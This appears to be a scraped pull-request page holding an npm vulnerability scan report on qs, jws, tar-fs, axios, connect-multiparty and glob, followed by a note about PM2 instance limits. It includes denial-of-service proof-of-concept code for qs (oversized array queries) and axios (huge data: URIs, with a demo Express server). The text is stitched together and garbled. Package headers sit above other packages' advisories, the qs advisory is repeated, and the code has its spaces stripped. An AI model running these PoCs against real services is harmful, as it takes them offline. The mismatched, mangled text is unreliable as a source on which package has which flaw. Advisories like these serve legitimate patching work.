if(root==='[]'&&options.parseArrays){// Use currentArrayLength already calculated at line 147-151if(options.throwOnLimitExceeded&¤tArrayLength>=options.arrayLimit){thrownewRangeError('Array limit exceeded. Only '+options.arrayLimit+' element'+(options.arrayLimit===1 ? '' : 's')+' allowed in an array.');}// If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)if(currentArrayLength>=options.arrayLimit){obj=options.plainObjects ? {__proto__: null} : {};obj[currentArrayLength]=leaf;}else{obj=options.allowEmptyArrays&&(leaf===''||(options.strictNullHandling&&leaf===null))
? []
: utils.combine([],leaf);}}
This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).
tar-fs2.1.3 (npm)
pkg:npm/tar-fs@2.1.3
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.
Details
The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).
Vulnerable code (lib/parse.js:159-162):
if(root==='[]'&&options.parseArrays){obj=utils.combine([],leaf);// No arrayLimit check}
The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.
PoC
Test 1 - Basic bypass:
npm install qs
constqs=require('qs');constresult=qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6',{arrayLimit: 5});console.log(result.a.length);// Output: 6 (should be max 5)
Test 2 - DoS demonstration:
constqs=require('qs');constattack='a[]='+Array(10000).fill('x').join('&a[]=');constresult=qs.parse(attack,{arrayLimit: 100});console.log(result.a.length);// Output: 10000 (should be max 100)
Configuration:
arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
Use bracket notation: a[]=value (not indexed a[0]=value)
Impact
Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.
Attack scenario:
Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
Application parses with qs.parse(query, { arrayLimit: 100 })
qs ignores limit, parses all 100,000 elements into array
Server memory exhausted → application crashes or becomes unresponsive
Service unavailable for all users
Real-world impact:
Single malicious request can crash server
No authentication required
Easy to automate and scale
Affects any endpoint parsing query strings with bracket notation
Suggested Fix
Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.
Current code (lib/parse.js:159-162):
if(root==='[]'&&options.parseArrays){obj=options.allowEmptyArrays&&(leaf===''||(options.strictNullHandling&&leaf===null))
? []
: utils.combine([],leaf);// No arrayLimit check}
Fixed code:
if(root==='[]'&&options.parseArrays){// Use currentArrayLength already calculated at line 147-151if(options.throwOnLimitExceeded&¤tArrayLength>=options.arrayLimit){thrownewRangeError('Array limit exceeded. Only '+options.arrayLimit+' element'+(options.arrayLimit===1 ? '' : 's')+' allowed in an array.');}// If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)if(currentArrayLength>=options.arrayLimit){obj=options.plainObjects ? {__proto__: null} : {};obj[currentArrayLength]=leaf;}else{obj=options.allowEmptyArrays&&(leaf===''||(options.strictNullHandling&&leaf===null))
? []
: utils.combine([],leaf);}}
This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).
jws4.0.0 (npm)
pkg:npm/jws@4.0.0
Improper Verification of Cryptographic Signature
Affected range
=4.0.0
Fixed version
4.0.1
CVSS Score
7.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS Score
0.009%
EPSS Percentile
1st percentile
Description
Overview
An improper signature verification vulnerability exists when using auth0/node-jws with the HS256 algorithm under specific conditions.
Am I Affected?
You are affected by this vulnerability if you meet all of the following preconditions:
Application uses the auth0/node-jws implementation of JSON Web Signatures, versions <=3.2.2 || 4.0.0
Application uses the jws.createVerify() function for HMAC algorithms
Application uses user-provided data from the JSON Web Signature Protected Header or Payload in the HMAC secret lookup routines
You are NOT affected by this vulnerability if you meet any of the following preconditions:
Application uses the jws.verify() interface (note: auth0/node-jsonwebtoken users fall into this category and are therefore NOT affected by this vulnerability)
Application uses only asymmetric algorithms (e.g. RS256)
Application doesn’t use user-provided data from the JSON Web Signature Protected Header or Payload in the HMAC secret lookup routines
Fix
Upgrade auth0/node-jws version to version 3.2.3 or 4.0.1
Acknowledgement
Okta would like to thank Félix Charette for discovering this vulnerability.
tar-fs3.0.9 (npm)
pkg:npm/tar-fs@3.0.9
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability in Linkify (linkifyjs) allows XSS Targeting HTML Attributes and Manipulating User-Controlled Variables.This issue affects Linkify: from 4.3.1 before 4.3.2.
axios1.8.4 (npm)
pkg:npm/axios@1.8.4
Allocation of Resources Without Limits or Throttling
Affected range
>=1.0.0 <1.12.0
Fixed version
1.12.0
CVSS Score
7.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score
0.109%
EPSS Percentile
30th percentile
Description
Summary
When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.
Details
The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.
constaxios=require('axios');asyncfunctionmain(){// this example decodes ~120 MBconstbase64Size=160_000_000;// 120 MB after decodingconstbase64='A'.repeat(base64Size);consturi='data:application/octet-stream;base64,'+base64;console.log('Generating URI with base64 length:',base64.length);constresponse=awaitaxios.get(uri,{responseType: 'arraybuffer'});console.log('Received bytes:',response.data.length);}main().catch(err=>{console.error('Error:',err.message);});
Run with limited heap to force a crash:
node --max-old-space-size=100 poc.js
Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.
importexpressfrom"express";importmorganfrom"morgan";importaxiosfrom"axios";importhttpfrom"node:http";importhttpsfrom"node:https";import{PassThrough}from"node:stream";constkeepAlive=true;consthttpAgent=newhttp.Agent({ keepAlive,maxSockets: 100});consthttpsAgent=newhttps.Agent({ keepAlive,maxSockets: 100});constaxiosClient=axios.create({timeout: 10000,maxRedirects: 5,
httpAgent, httpsAgent,headers: {"User-Agent": "axios-poc-link-preview/0.1 (+node)"},validateStatus: c=>c>=200&&c<400});constapp=express();constPORT=Number(process.env.PORT||8081);constBODY_LIMIT=process.env.MAX_CLIENT_BODY||"50mb";app.use(express.json({limit: BODY_LIMIT}));app.use(morgan("combined"));app.get("/healthz",(req,res)=>res.send("ok"));/** * POST /preview { "url": "<http|https|data URL>" } * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector). */app.post("/preview",async(req,res)=>{consturl=req.body?.url;if(!url)returnres.status(400).json({error: "missing url"});letu;try{u=newURL(String(url));}catch{returnres.status(400).json({error: "invalid url"});}// Developer allows using data:// in the allowlistconstallowed=newSet(["http:","https:","data:"]);if(!allowed.has(u.protocol))returnres.status(400).json({error: "unsupported scheme"});constcontroller=newAbortController();constonClose=()=>controller.abort();res.on("close",onClose);constbefore=process.memoryUsage().heapUsed;try{constr=awaitaxiosClient.get(u.toString(),{responseType: "stream",maxContentLength: 8*1024,// Axios will ignore this for data:maxBodyLength: 8*1024,// Axios will ignore this for data:signal: controller.signal});// stream only the first 64KB backconstcap=64*1024;letsent=0;constlimiter=newPassThrough();r.data.on("data",(chunk)=>{if(sent+chunk.length>cap){limiter.end();r.data.destroy();}else{sent+=chunk.length;limiter.write(chunk);}});r.data.on("end",()=>limiter.end());r.data.on("error",(e)=>limiter.destroy(e));constafter=process.memoryUsage().heapUsed;res.set("x-heap-increase-mb",((after-before)/1024/1024).toFixed(2));limiter.pipe(res);}catch(err){constafter=process.memoryUsage().heapUsed;res.set("x-heap-increase-mb",((after-before)/1024/1024).toFixed(2));res.status(502).json({error: String(err?.message||err)});}finally{res.off("close",onClose);}});app.listen(PORT,()=>{console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);});
Enforce size limits
For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.
Stream decoding
Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.
Details
The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).
Vulnerable code (lib/parse.js:159-162):
if(root==='[]'&&options.parseArrays){obj=utils.combine([],leaf);// No arrayLimit check}
The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.
PoC
Test 1 - Basic bypass:
npm install qs
constqs=require('qs');constresult=qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6',{arrayLimit: 5});console.log(result.a.length);// Output: 6 (should be max 5)
Test 2 - DoS demonstration:
constqs=require('qs');constattack='a[]='+Array(10000).fill('x').join('&a[]=');constresult=qs.parse(attack,{arrayLimit: 100});console.log(result.a.length);// Output: 10000 (should be max 100)
Configuration:
arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
Use bracket notation: a[]=value (not indexed a[0]=value)
Impact
Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.
Attack scenario:
Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
Application parses with qs.parse(query, { arrayLimit: 100 })
qs ignores limit, parses all 100,000 elements into array
Server memory exhausted → application crashes or becomes unresponsive
Service unavailable for all users
Real-world impact:
Single malicious request can crash server
No authentication required
Easy to automate and scale
Affects any endpoint parsing query strings with bracket notation
Suggested Fix
Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.
Current code (lib/parse.js:159-162):
if(root==='[]'&&options.parseArrays){obj=options.allowEmptyArrays&&(leaf===''||(options.strictNullHandling&&leaf===null))
? []
: utils.combine([],leaf);// No arrayLimit check}
Fixed code:
if(root==='[]'&&options.parseArrays){// Use currentArrayLength already calculated at line 147-151if(options.throwOnLimitExceeded&¤tArrayLength>=options.arrayLimit){thrownewRangeError('Array limit exceeded. Only '+options.arrayLimit+' element'+(options.arrayLimit===1 ? '' : 's')+' allowed in an array.');}// If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)if(currentArrayLength>=options.arrayLimit){obj=options.plainObjects ? {__proto__: null} : {};obj[currentArrayLength]=leaf;}else{obj=options.allowEmptyArrays&&(leaf===''||(options.strictNullHandling&&leaf===null))
? []
: utils.combine([],leaf);}}
This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).
connect-multiparty2.2.0 (npm)
pkg:npm/connect-multiparty@2.2.0
Unrestricted Upload of File with Dangerous Type
Affected range
<=2.2.0
Fixed version
Not Fixed
CVSS Score
7.8
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score
0.448%
EPSS Percentile
63rd percentile
Description
An arbitrary file upload vulnerability in the file upload module of Express Connect-Multiparty 2.2.0 allows attackers to execute arbitrary code via a crafted PDF file. NOTE: the Supplier has not verified this vulnerability report.
glob10.4.5 (npm)
pkg:npm/glob@10.4.5
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Affected range
>=10.2.0 <10.5.0
Fixed version
11.1.0
CVSS Score
7.5
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS Score
0.038%
EPSS Percentile
11th percentile
Description
Summary
The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.
Details
Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:
Commands execute with full privileges of the user running glob CLI
No privilege escalation required - runs as current user
Access to environment variables, file system, and network
Real-World Attack Scenarios:
1. CI/CD Pipeline Compromise:
Malicious PR adds files with crafted names to repository
CI pipeline uses glob -c to process files (linting, testing, deployment)
Commands execute in CI environment with build secrets and deployment credentials
Potential for supply chain compromise through artifact tampering
2. Developer Workstation Attack:
Developer clones repository or extracts archive containing malicious filenames
Local build scripts use glob -c for file processing
Developer machine compromise with access to SSH keys, tokens, local services
3. Automated Processing Systems:
Services using glob CLI to process uploaded files or external content
File uploads with malicious names trigger command execution
Server-side compromise with potential for lateral movement
4. Supply Chain Poisoning:
Malicious packages or themes include files with crafted names
Build processes using glob CLI automatically process these files
Wide distribution of compromise through package ecosystems
Platform-Specific Risks:
POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
Mixed Environments: CI systems often use Linux containers regardless of developer platform
Affected Products
Ecosystem: npm
Package name: glob
Component: CLI only (src/bin.mts)
Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
Introduced: v10.2.0 (first release with CLI containing -c/--cmd option)
Patched versions: 11.1.0and 10.5.0
Scope Limitation:
Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable
Remediation
Upgrade to glob@10.5.0, glob@11.1.0, or higher, as soon as possible.
If any glob CLI actions fail, then convert commands containing positional arguments, to use the --cmd-arg/-g option instead.
As a last resort, use --shell to maintain shell:true behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Modified the PM2 production startup configuration to limit cluster instances from unlimited (max) to exactly 2 instances. This change reduces the number of Node.js processes spawned in production, potentially lowering memory consumption and improving resource management. The adjustment is made in the start script within the website/package.json file.